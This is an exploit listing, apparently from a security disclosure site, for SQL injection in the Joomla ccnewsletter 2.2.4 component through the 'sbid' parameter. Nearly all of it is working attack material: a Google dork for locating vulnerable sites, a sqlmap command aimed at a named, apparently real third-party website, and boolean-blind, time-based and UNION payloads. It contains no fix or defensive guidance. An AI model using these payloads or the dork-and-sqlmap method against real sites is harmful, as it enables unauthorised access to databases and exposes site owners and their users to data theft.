jommla component ccnewsletter 2.2.4 - 'sbid' Parameter SQL Injection

2019.09.23
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

"jommla component ccnewsletter 2.2.4 - 'sbid' Parameter SQL Injection" # Exploit Title: jommla component ccnewsletter 2.2.4 - SQL Injection # Date: 2019.09.23 # Exploit Author: Mahdi Karimi # Vendor HomePage: https://extensions.joomla.org/extension/ccnewsletter/ # Version: 2.2.4 [Final Version] # Tested on: win # Google Dork: inurl:index.php?option=com_ccnewsletter inurl:sbid sqlmap: sqlmap -u "http://news.healthforanimals.org/index.php?option=com_ccnewsletter&view=detail&id=97&sbid=148&Itemid=4&tmpl=newsletter" -p sbid --dbs Testing Method; - boolean-based blind - time-based blind - UNION query Parameter: sbid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: option=com_ccnewsletter&view=detail&id=97&sbid=148 AND 3304=3304&Itemid=4&tmpl=newsletter Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: option=com_ccnewsletter&view=detail&id=97&sbid=148 AND SLEEP(5)&Itemid=4&tmpl=newsletter Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: option=com_ccnewsletter&view=detail&id=97&sbid=-3378 UNION ALL SELECT NULL,CONCAT(0x716a767871,0x416d6c435542734d6155546b64495978596547517a484468426e59664775654359556950614f4d72,0x71766b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uxIT&Itemid=4&tmpl=newsletter


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top